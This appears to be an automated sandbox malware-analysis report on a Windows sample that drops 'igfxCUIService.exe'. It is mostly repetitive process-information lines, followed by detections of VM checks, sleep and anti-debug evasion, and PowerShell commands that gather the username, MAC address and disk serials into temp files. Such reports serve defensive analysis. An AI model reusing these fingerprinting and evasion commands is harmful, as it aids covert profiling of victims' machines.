                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion:

                        barindex
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe TID: 5736Thread sleep time: -30987s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5352Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6072Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 4112Thread sleep time: -30792s >= -30000sJump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 4112Thread sleep time: -30908s >= -30000sJump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 4112Thread sleep time: -32018s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4520Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1065Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1857Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2595Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5118Jump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeAPI coverage: 8.8 %
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeAPI coverage: 8.5 %
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D4B17F FindFirstFileExW,7_2_00D4B17F
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeThread delayed: delay time: 30987Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 30792Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 30908Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 32018Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C01195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C01195
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BD40F0 GetProcessHeap,__Init_thread_footer,__Init_thread_footer,0_2_00BD40F0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C02B5D mov eax, dword ptr fs:[00000030h]0_2_00C02B5D
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C0AF0E mov eax, dword ptr fs:[00000030h]0_2_00C0AF0E
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D42B5D mov eax, dword ptr fs:[00000030h]7_2_00D42B5D
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D4AF0E mov eax, dword ptr fs:[00000030h]7_2_00D4AF0E
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C01195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C01195
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BF4DD5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BF4DD5
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BF46CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BF46CB
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D34F68 SetUnhandledExceptionFilter,7_2_00D34F68
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D41195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00D41195
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D346CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00D346CB
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D34DD5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00D34DD5

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        Encrypted powershell cmdline option foundShow sources
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: Base64 decoded [B> j^6jm&Z"}+"qfyRzmb'rb}#6i,jzjlm
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: Base64 decoded [B> j^6jm&Z"}+"qfyRzmb'rb}#6i,jzjlmJump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
